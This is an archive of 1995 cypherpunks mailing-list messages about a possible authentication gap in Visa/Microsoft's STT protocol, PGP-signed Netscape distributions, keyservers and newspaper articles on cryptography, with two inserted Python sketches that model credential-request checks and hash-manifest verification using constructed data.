issuing bank, which then responds with a "Cardholder Credential Response"
containing the signature and key-exchange creds, also encrypted. However
there does not appear to be any authentication whatsoever on the credential
request message, presumably because the cardholder does not have a published
public key at the time when this message is issued. It may be that
authentication is out-of-band - e.g. the bank may phone the registered owner
of the card # before issuing a cred response message - but there is no
mention of this in the spec. If there isn't OOB authentication, then this is
a major hole in the protocol, since anyone who knew a credit card no, name
and expiry date could request a cred for that card, and then go shopping...

If someone will just tell me what I'm missing (because this is too obviously
f'd up for even Uncle Bill) then I'll go sit on top of my mountain again and
hum softly to myself.

Andrew

BTW, same appears to be true for Merchant creds.
________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key: ftp.vironix.co.za/PGP-keys/AndrewRoos (or key servers)
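
A simplified model of the point raised in the message above, added here as an illustration and not taken from the STT spec or the original post: a hash carried inside the request shows the data was not altered, but says nothing about who built it. The message layout, the SHA-256 stand-in for the spec's "SHA", the per-card activation secret used as the out-of-band check, and the card details are all assumptions or constructed values; encryption to the bank is left out because it does not restrict who can create a request.

```python
import hashlib
import hmac
import json

# Constructed sample data (test card number, not a real account).
CARD = {"pan": "4111111111111111", "name": "A. CARDHOLDER", "expiry": "12/97"}
# Hypothetical: a secret the issuer delivered to the registered cardholder
# out of band (for example by post or phone), keyed by card number.
ISSUER_SECRETS = {"4111111111111111": b"constructed-activation-code"}


def build_request(card, pubkey_hex):
    """Credential request as described: card details, public key, hash of both."""
    body = json.dumps({"card": card, "pubkey": pubkey_hex}, sort_keys=True).encode()
    return {"body": body, "sha": hashlib.sha256(body).hexdigest()}


def issuer_check_as_described(req):
    """Integrity only: recompute the hash over the body and compare."""
    want = hashlib.sha256(req["body"]).hexdigest()
    return hmac.compare_digest(want, req["sha"])


def build_request_oob(card, pubkey_hex, activation_secret):
    """Same request plus a MAC keyed with the out-of-band secret."""
    req = build_request(card, pubkey_hex)
    req["tag"] = hmac.new(activation_secret, req["body"], hashlib.sha256).hexdigest()
    return req


def issuer_check_oob(req, secrets_by_pan):
    """Accept only if the requester proves knowledge of the out-of-band secret."""
    if not issuer_check_as_described(req):
        return False
    pan = json.loads(req["body"])["card"]["pan"]
    secret = secrets_by_pan.get(pan)
    if secret is None or "tag" not in req:
        return False
    want = hmac.new(secret, req["body"], hashlib.sha256).hexdigest()
    return hmac.compare_digest(want, req["tag"])


if __name__ == "__main__":
    # A request built by a party who knows only what is printed on the card.
    unproven = build_request(CARD, "aa" * 32)
    print("hash-only check accepts:", issuer_check_as_described(unproven))
    print("out-of-band check accepts:", issuer_check_oob(unproven, ISSUER_SECRETS))

    # A request built by the cardholder, who also holds the activation secret.
    proven = build_request_oob(CARD, "bb" * 32, ISSUER_SECRETS[CARD["pan"]])
    print("out-of-band check accepts cardholder:", issuer_check_oob(proven, ISSUER_SECRETS))
```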





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 2 Oct 95 23:56:49 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
In-Reply-To: <9510010616.AA06860@sulphur.osf.org>
Message-ID: <199510030655.AA59891@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>SAIC ran the Center for Seismic Studies in Arlington, VA.  Rick Adams,
>co-founder of UUnet, made one of their machines, seismo, the UUCP hub of the
>world for a couple of years.

I wonder how much intel that gained them.

Mark
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 3 Oct 95 10:20:40 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <9510031719.AA12326@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
 > In article <9510030248.AA08909@hplyot.obspm.fr>, dl@hplyot.obspm.fr (Laurent Demailly) writes:
 > > I asked months ago netscape folks to make md5sum and/or PGP digital
 > > signatures (preferably md5sum of each file, this in a file, itself
 > > pgp signed) of the binaries available on their page and on relevant
 > > newsgroup to reduce possibility of tampering.
[...]
 >   I've been thinking about this recently for obvious reasons.  My concern
 > is that if someone can attack your download of netscape, they could also
 > attack your download of the program that validates netscape.  Is there
 > really any way out of this one?
I have *already* downloaded, checked,... pgp years ago, and I did
multiplatform cross tests,... so all I need is pgp signed stuff
(obviously I need your (netscape's) pgp public key too, but I think
that a "massive" distribution, that is: mail on a couple of mailing
lists, your site, newsgroup, eventually adding fingerprint by phone
for the paranoid, would ensure that your key is indeed your key (it
can probably take a few weeks before it's "sure" (you'll get feedback if
the key has been tampered with somehow)
Or easiest even manage that your key is signed by some well known folk
(PhilZ,...))

See my point?

ps: imo the later you start, the harder it'll be to be "sure" of
something. (reputation of a key takes some weeks/months,...)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

$400 million in gold Legion of Doom mururoa assassination break Peking
Delta Force
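
The scheme discussed in this thread (a file of per-file hashes, itself authenticated, with the authenticating value published through several channels), sketched as an added example that is not part of the original messages. Two substitutions are made so it runs offline: SHA-256 replaces md5sum, and agreement of the manifest digest across independent channels stands in for checking a PGP signature. File names, contents and channel names are constructed.

```python
import hashlib


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict) -> str:
    """One '<digest>  <name>' line per file, in the style of md5sum output."""
    return "".join(f"{digest(data)}  {name}\n" for name, data in sorted(files.items()))


def parse_manifest(text: str) -> dict:
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected '<digest>  <name>'")
        hexdigest, name = parts[0].lower(), parts[1].strip()
        if len(hexdigest) != 64 or any(c not in "0123456789abcdef" for c in hexdigest):
            raise ValueError(f"line {lineno}: not a SHA-256 hex digest")
        if name in entries:
            raise ValueError(f"line {lineno}: duplicate entry for {name}")
        entries[name] = hexdigest
    return entries


def corroborated(manifest_text: str, channel_digests: dict, quorum: int = 2):
    """Compare the manifest we fetched with the digest seen on each channel.

    Policy assumed here: at least `quorum` channels must agree and none may
    disagree, since any disagreement means some copy has been altered.
    """
    seen = digest(manifest_text.encode())
    agree = sorted(c for c, d in channel_digests.items() if d.lower() == seen)
    differ = sorted(set(channel_digests) - set(agree))
    return (len(agree) >= quorum and not differ), agree, differ


def check_download(manifest_text, channel_digests, files, quorum=2):
    """Return {name: status}; refuse to use a manifest that is not corroborated."""
    ok, agree, differ = corroborated(manifest_text, channel_digests, quorum)
    if not ok:
        raise ValueError(f"manifest not corroborated: agree={agree} differ={differ}")
    expected = parse_manifest(manifest_text)
    report = {}
    for name, want in expected.items():
        if name not in files:
            report[name] = "missing"
        elif digest(files[name]) == want:
            report[name] = "ok"
        else:
            report[name] = "MISMATCH"
    for name in files:
        if name not in expected:
            report[name] = "unlisted"
    return report


# Constructed sample release and the digests a user collected per channel.
RELEASE = {
    "browser-unix.tar.Z": b"constructed unix build",
    "browser-win.exe": b"constructed windows build",
}
MANIFEST = build_manifest(RELEASE)
CHANNELS = {name: digest(MANIFEST.encode())
            for name in ("mailing-list", "newsgroup", "web-site")}

if __name__ == "__main__":
    print(check_download(MANIFEST, CHANNELS, RELEASE))
    altered = dict(RELEASE, **{"browser-win.exe": b"altered in transit"})
    print(check_download(MANIFEST, CHANNELS, altered))
    try:
        # Download site serves an altered file and a rewritten manifest.
        check_download(build_manifest(altered), CHANNELS, altered)
    except ValueError as err:
        print("rejected:", err)
```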




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 3 Oct 95 15:59:08 PDT
To: jgrubs@left.webcasters.com
Subject: Re: Keyserver keyrings
In-Reply-To: <g2ZecD1w165w@left.webcasters.com>
Message-ID: <199510032302.TAA12302@homeport.org>
MIME-Version: 1.0
Content-Type: text


| The public keyrings at MIT and Uni-Hamburg haven't been updated since August.
| Does anyone know why?

	There are two servers at MIT, Brian LaMacchia's (on swiss.ai?)
and the one Derek set up on toxicwaste.  The toxicwaste one is
probably not being maintained because Derek has off and gotten a job,
and there's no one to maintain it.



Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@wmono.remailer (Anonymous)
Date: Tue, 3 Oct 95 17:04:06 PDT
To: cypherpunks@toad.com
Subject: meeting on 20th
Message-ID: <199510040004.TAA08747@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


could someone that goes make a transcript of the hearing???
like to hear it but too far away!!

10x.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Tue, 3 Oct 95 19:27:27 PDT
To: cypherpunks@toad.com
Subject: Re: Keyserver keyrings
In-Reply-To: <199510040126.VAA11270@toxicwaste.media.mit.edu>
Message-ID: <199510040222.TAA02828@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


According to 'Derek Atkins':
 
> The name pgp.mit.edu is now
> pointing at another machine (which I do not maintain).  For access to
> the keyring, send email to pgp-public-keys@pgp.mit.edu -- that is the
> supported method of access.

does anybody out there maintain a current keyring that can be grabbed
via anon ftp instead? It seems like a waste of time for hundreds of
users to continually add updates to their own keyrings when the whole
keyserver ring can be picked up at one time, updates and all? ftp is
much more convenient than stringing together multiple sections received
by e-mail.

thx.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Johnson <rickj@microsoft.com>
Date: Tue, 3 Oct 95 21:16:57 PDT
To: www-security@ns2.rutgers.edu
Subject: Comments on STT Spec Implementation Details
Message-ID: <9510040519.AA05397@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi All -

Last week our team published jointly with Visa the STT specification.  
Since then, we've received some comments that the wire formats and 
protocols section for STT have not been complete enough for developers 
to implement.

We're very interested in feedback and specifics on this.  We worked to 
keep _only_ the detail we felt required to implement STT -- the 
language is intentionally terse.  However, it is in everyone's best 
interest that the STT spec is completely understood and implementable.

We want your participation in this.  We've set up an alias direct to 
our team to respond to your comments:

	stt@microsoft.com

Non-technical flames direct to:

Rick

 - aka -

Rick Johnson
rickj@microsoft.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 3 Oct 95 20:06:30 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <199510040218.MAA04820@sweeney.cs.monash.edu.au>
Message-ID: <199510040300.UAA05650@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> If you mention all over the place that the program is PGP-signed
> to foil {cr,h}ackers and viruses (*), chances are a lot of people will
> ask their one colleague or friend that does know PGP to verify it for them.

	Yeah, just imagine the PR possibilities!

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 3 Oct 95 17:29:31 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Strong authentication for Netscape distributions
In-Reply-To: <9510031403.ZM151@tofuhut>
Message-ID: <9510040026.AA18012@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: Jeff Weinstein <jsw@netscape.com>
    Date: Tue, 3 Oct 1995 14:03:28 -0700
    Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!) 

    . . .

      Yes, I get the idea about spewing the signed hashes everywhere.  The
    problem I have is with the user of PGP.  That will help cypherpunks,
    but does absolutely nothing for most of our millions of users, who
    have no idea what PGP is.  Perhaps it's enough to assume that if anyone
    is tampering with the distribution, some cypherpunk will stumble across
    it...

I suspect that most of these millions don't know about md5 or much of
anything in the way of strong authentication.  However, if you provide
any sure-fire mechanism by which someone could detect that the
distribution has been tampered with, it would be an improvement over
not having any.  If someone does happen to notice tampering and send
mail to cypherpunks about it, I'd guess that there's a good chance it
would be reported in major publications shortly thereafter.

You might want to indirect through BETSI . . . .

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHHUeZNR+/jb2ZlNAQHVCQP8CBb5c/0nX41awTf/kt+gGODu4qLcJVI8
rc604+rdr0YUFPVTStwXdUCg7gKgUTOC8werBPK5Dgyse/8u1jczU4Czub9Cd693
EfUW7o2oHN5/3x9E0Yn1rJD+ffwuGC+lf1EMBJMHsTwJzbPmy0FJPfyfyDlvWrDD
OQDsJ5DbOHU=
=s/t0
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 3 Oct 95 21:00:14 PDT
To: cypherpunks@toad.com
Subject: The Evolution of  Cooperation (Towards a mathematical theory of reputation?)
Message-ID: <ac97b7d503021004c5f9@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I highly recommend Axelrod's short book, The Evolution of  Cooperation, for
those (like me) who find it hard to think clearly about trust issues. You
have probably heard about prisoner's dilemma, tit-for-tat etc. Axelrod is a
very early worker in this field. He set up a tournament of programmed bugs
that competed with each other in an artificial environment. They could
survive only by cooperation with other bugs. They could also cheat.

Axelrod does not use the term "reputation" but it is what one bug gains or
loses as it interacts with other bugs in iterated encounters.

I read the book about two years ago. Only last night did I realize that
those ideas helped me think about the MITM threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 3 Oct 95 20:57:05 PDT
To: cypherpunks@toad.com
Subject: MD4 collision
Message-ID: <ac97c47804021004bddb@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Hans Dobbertin in Germany has found two messages to which
MD4 assigns the same hash.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Tue, 3 Oct 95 21:06:50 PDT
To: sbryan@maroon.tc.umn.edu (Steve Bryan)
Subject: Re: macworld crypto articles
In-Reply-To: <v02130502ac8f4f64de57@[204.221.10.130]>
Message-ID: <9510040358.AA09395@doom>
MIME-Version: 1.0
Content-Type: text/plain



> PGP is probably too unwieldy for the non-hobbyist to comfortably use. I
> don't know if anyone else has suggested it but I'd strongly encourage
> Intuit to make CryptDisk for the Mac easily available. I use it to maintain
> an encrypted partition for my financial data and the user interface is
> quite simple. I believe the DOS equivalent is SecureDisk.

I think that it's a good idea to make users aware of the options.  I
haven't used CryptDisk or SecureDisk myself, but I'll check them both
out.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 3 Oct 95 18:23:46 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510031403.ZM151@tofuhut>
Message-ID: <199510040123.VAA11236@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   Yes, I get the idea about spewing the signed hashes everywhere.  The
> problem I have is with the user of PGP.  That will help cypherpunks,
> but does absolutely nothing for most of our millions of users, who
> have no idea what PGP is.  Perhaps it's enough to assume that if anyone
> is tampering with the distribution, some cypherpunk will stumble across
> it...

If nothing else, Jeff, it will expose those "millions of users, who
have no idea what PGP is" to PGP.  And, hopefully, some of those
"millions of users" might even take the time to grab PGP and take a
look at that, too.

In other words, there is nothing to lose (except a little bit of time
and effort, and a small amount of storage space) and there is a heck
of a lot to gain by including PGP signatures.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 3 Oct 95 18:26:31 PDT
To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Subject: Re: Keyserver keyrings
In-Reply-To: <g2ZecD1w165w@left.webcasters.com>
Message-ID: <199510040126.VAA11270@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The public keyrings at MIT and Uni-Hamburg haven't been updated since August.
> Does anyone know why?

Umm.. To which keyring are you referring at MIT?  If you mean the ring
at ftp://toxicwaste.mit.edu/pub/keys, then that is because toxicwaste
is no longer the pgp.mit.edu keyserver.  The name pgp.mit.edu is now
pointing at another machine (which I do not maintain).  For access to
the keyring, send email to pgp-public-keys@pgp.mit.edu -- that is the
supported method of access.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Oct 95 18:41:44 PDT
To: cypherpunks@toad.com
Subject: HUL_loo
Message-ID: <199510040141.VAA00105@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist of September 30-October 6 has a long survey
   of global telecommunications, excellently researched
   and written:

      The death of distance as a determinant of the cost of
      communications will probably be the single most
      important economic force shaping society in the first
      half of the next century. It will alter, in ways that
      are only dimly imaginable, decisions about where people
      live and work; concepts of national borders; patterns of
      international trade. Its effects will be as pervasive as
      those of the discovery of electricity.


   Buy it, see it at http://www.economist.com, or, in a pinch:


   HUL_loo  (92 kb in 6 parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 23:13:45 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031438.HAA06918@orac.engr.sgi.com>
Message-ID: <199510040204.WAA22162@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> In article <DFv6uo.4so@sgi.sgi.com>, Ray Cromwell <rjc@clark.net> writes:
> 
> > This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> > as soon as the mail window pops up. I'm too tired right now to try to
> > analyze it, but it might be another stack bug, this time, in the X
> > libraries because Netscape isn't doing any sanity checking.
> 
> This is a bug in your X server, not in netscape.  The X server should
> never crash no matter what you send to it.

  That's true, but it is also true that Netscape should also be
performing some sanity checking on input rather than relying on 
the supporting libraries to be secure. Remember, a hole is a hole.
The last sendmail bug was a buffer overflow in syslog, however,
sendmail still got patched to do bounds checking on the strings
it was passing to syslog. 

  It looks like this is only a bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
is it wise for netscape to be sending 10,000 character strings to GUI
functions anyway? 

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 3 Oct 95 19:25:17 PDT
To: jya@pipeline.com (John Young)
Subject: Re: HUL_loo
In-Reply-To: <199510040141.VAA00105@pipe3.nyc.pipeline.com>
Message-ID: <9510040222.AA12001@all.net>
MIME-Version: 1.0
Content-Type: text


> 
>    The Economist of September 30-October 6 has a long survey
>    of global telecommunications, excellently researched
>    and written:
> 
>       The death of distance as a determinant of the cost of
>       communications will probably be the single most
>       important economic force shaping society in the first
>       half of the next century. It will alter, in ways that
>       are only dimly imaginable, decisions about where people
>       live and work; concepts of national borders; patterns of
>       international trade. Its effects will be as pervasive as
>       those of the discovery of electricity.

Sounds like an extract from the first chapter of my recent book:
	"Protection and Security on the Information Superhighway"


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 3 Oct 95 20:30:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: NYT: WWW Usage Monitoring for Marketing
Message-ID: <199510040330.XAA31167@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


New York Times, National Edition, 95/10/03:

A positive sign in the marketing/privacy war on the net:

In his regular Advertising column, Stuart Elliott discusses the presentation
of a report on the problem of "assuring accurate and comprehensive measurement
of consumer exposure to advertisements that appear in interactive media like
World Wide Web sites and on-line services."

The report was issued by "Casie", the Coalition for Advertising Supported
Information and Entertainment, a creation of two main advertising trade 
groups: the American Assn. of Advertising Agencies, and the Assn. of Nat'l.
Advertisers.

Elliott's article identifies three main issues covered in the report. One of
these is privacy:

	"Every effort should be made to maintain consumers' privacy,"
	the report urges, adding that identities of computer users 
	"must not be revealed by audience measurement providers."

-Futplex <futplex@pseudonym.com>
If you haven't seen the film "Twelve Angry Men", it's about time you did.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 3 Oct 95 20:55:11 PDT
To: List <cypherpunks@toad.com>
Subject: Article requests
Message-ID: <Pine.OSF.3.91.951003235406.13722D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


I have received many requests for the articles that I wrote on 
Cryptography so I will post them to the list with the subject "ARTICLES"
 
Regards, Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 3 Oct 95 20:57:47 PDT
To: List <cypherpunks@toad.com>
Subject: ARTICLES
Message-ID: <Pine.OSF.3.91.951003235732.13722E-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Copyright (C) 1995 
Tim Philp 
Brantford, Ontario 
Canada     
 
Article appeared in The Expositor, Brantford, Ont., Canada 
June 10th, 1995 
 
	 -  COMPUTER CRYPTOGRAPHY - 
	 - PROTECTING YOUR PRIVACY - 
	           by 
		Tim Philp 
 
	Last week I discussed ways that the computer has 
made our lives less private. Today we take up that thread and 
talk about the stuff of spy novels. Cryptography, in the context 
that we are discussing it, is a means of preventing 
unauthorized people from reading our files or correspondence. 
Cryptography is not new. It has been used throughout history 
and has played its part in shaping events. Mary Queen of Scots 
was beheaded because the cipher that she used to arrange a 
rebellion against Elizabeth I was decoded by the government. 
	Julius Caesar used a primitive cipher, now known as a 
Caesar Cipher, to disguise his messages to Rome during his 
military campaigns. Every letter in his messages was replaced 
by the letter three letters farther in the alphabet. Thus A would 
become D, B would become E, until you reached the end of the 
alphabet. You would then wrap around to make X equal to A, 
Y equal to B and Z equal to C. In this way the word CAESAR 
would become FDHVDU. Simple substitution ciphers like this 
one are easily broken and today are used in puzzle books to 
provide a few moments' diversion to puzzle fanciers. 
	The role of computers in cryptography goes back to 
the early days of computers. One of the first computers was 
used to help decode enemy messages in England during the 
second world war. The 'boffins of Bletchley' were the true 
progenitors of the computer, not IBM. 
	Cryptography has progressed far beyond the simple 
Caesar Cipher. Indeed, today's methods of encoding messages 
have progressed to the point where the ciphers are unbreakable 
within any reasonable amount of effort. It does no good to 
break a cipher if it takes 1500 years of computer time to do it! 
	Of interest to computer users is the development of a 
type of cryptography called Public Key Cryptography. With 
this method you have two keys, a public key and a private key. 
Simply speaking, a key is a very long number that is used by 
your program to encode and decode messages. Each person 
that you want to communicate with has a public key that is 
published and is known by everyone.  
	To send a message to your friend you would use his 
public key to encode the message. Your friend receives the 
message and uses his private key to decode the message. 
	The beauty of this technique is that an eavesdropper can 
intercept the encoded message and the public key of the 
recipient, but he cannot use this information to decode the 
message without the secret key of the recipient. 
	In older systems you had to transmit the secret key to 
the recipient. The secret key could be intercepted and used to 
decode the messages. Public key systems require that only the 
public key be transmitted to the recipient. The message cannot 
be decoded using only the public key and the message. 
	The availability to the general public of secure, 
military grade cryptographic methods has generated 
considerable controversy. The US government has placed this 
software under export control and has suggested the use of 
their own system called Clipper. Clipper has a 'backdoor' that 
will allow the government to decode secret messages. They 
claim that they need this power to combat drugs and crime. 
Civil libertarians claim that the government has no business 
intercepting private communications. 
	Cryptography can be used to protect E-Mail messages 
and computer files. The software to do this is freely available 
on the Internet (search for PGP). The US government, it 
seems, is locking the barn door after the horses have escaped. 
 
This file may not be reproduced by any means without the 
permission of the author 


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMHM8unseeMISF+fVAQFesQP/YxFgW3BAjnvDCMU4SfksgpKLEGMDMv9M
YQpn/0BqUZSUnO3yye1bIN5KsDofePaCd6PcE6RcnvZJTBVu9PiZvxiBkr/a76wf
5Ft+F4p2tH0gxPunXZyjDqEnfHDcXY+X0FM7JgmeMyjDxzbq6GIqEX7gLoPAszwp
Ayu4jIl2smg=
=76yF
-----END PGP SIGNATURE-----


===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 3 Oct 95 20:59:34 PDT
To: List <cypherpunks@toad.com>
Subject: ARTICLES
Message-ID: <Pine.OSF.3.91.951004000011.13722F-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Copyright (C) 1995 
Tim Philp 
Brantford, Ontario 
Canada     
 
Article appeared in The Expositor, Brantford, Ont., Canada 
Sept 9th, 1995 
 
		- THE CODEBREAKERS - 
	                 by 
		      Tim Philp 
	A couple of weeks ago an extraordinary event took 
place that has implications for all users of the Internet. A 
group on the Internet, who call themselves CYPHERpunks, 
ran a test of a code system that was considered uncrackable in 
any reasonable amount of time. This in itself was not the 
extraordinary event. This code was broken by the cypherpunks 
in only 31.5 HOURS! That's right, hours. This code, called 
SSL, used a 40 bit encypherment key with 1,099,511,627,776 
possible combinations. 
	To give you an example of just how incredible this 
feat was, let's examine the security of this code. If you were to 
try 1 key per second it would take you just over 34,841 years to 
try them all. That is almost five times longer than all of 
recorded history. 
	How was this done and what does this mean to users 
of the Internet? The how part is simple to explain, the meaning 
will be more difficult to divine. 
	The security of a code must rely only upon the key 
used to encipher the plaintext. It is assumed that the method of 
encryption is well known, as indeed it would be if it were used 
in a commercial product. Someone would disassemble the code 
and figure out the method. It is for this reason that security 
cannot reside in a secret means of encypherment. SSL is one 
such code. 
	This group, the Cypherpunks, wrote a program that 
would try keys in sequence and then they distributed it to the 
Internet community. They then set up a central computer that 
people all over the world could call into and get assigned a 
group of keys to try. These people would then feed these keys 
into the code cracking program and report the results to the 
central computer.  
	With hundreds of users taking part, using computers 
that were sitting idle at nights running screen savers, they 
cracked the code in 31.5 hours. 
	One of the greatest arguments against people trying 
this kind of brute force attack on codes, is that the computer 
time and power required would cost the earth. In actual fact, 
this successful attack cost nothing at all as the computers used 
were sitting idle. 
	Everything from little 286 PCs to mini-computer 
workstations were pressed into service labouring long over the 
weekend tirelessly trying one possible key after another until 
they cracked the code. 
	Because this was an academic exercise, there was no 
harm done. The purpose was to prove how quickly a 40 bit 
code could be cracked. I confess to be astounded at just how 
fast this was accomplished. 
	This points out two remarkable possibilities for the 
new communications technology that we are only now 
beginning to use. If that code were protecting sensitive 
information, such as a bank funds transfer, this group could be 
very rich. 
	It does also point out a new way of using the Internet 
to solve problems that have long eluded solution because of the 
sheer computational size of the problem.  
	If the problem were to be divided up into small 
chunks and given to hundreds of computers worldwide, 
solution may become possible. We are just beginning to 
understand the possibilities. 
 
This file may not be reproduced by any means without the 
permission of the author 


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMHM8znseeMISF+fVAQEGzgP+L+JQfTSZ1un83/oh2g/5Nthw3tiHVtb9
eDiOtuzvuQiLxMO/SUPnjM5cXlSYhTNCN8wF49IXEO5Istg58oIA8wf4MPr8aDML
dsK8h34rBQqVXjaxC9staKtKnTGLfZFLmKGwRShLJECgs6Bzqu25TptSYIa8RRGk
ncYhNj6Lalc=
=RE7O
-----END PGP SIGNATURE-----


===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 3 Oct 95 21:20:30 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
Message-ID: <9510040417.AA12468@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You might want to look at BETSI which was created to do this kind of
thing, too.  Check out
    http://info.bellcore.com/BETSI/betsi.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@powergrid.electriciti.com>
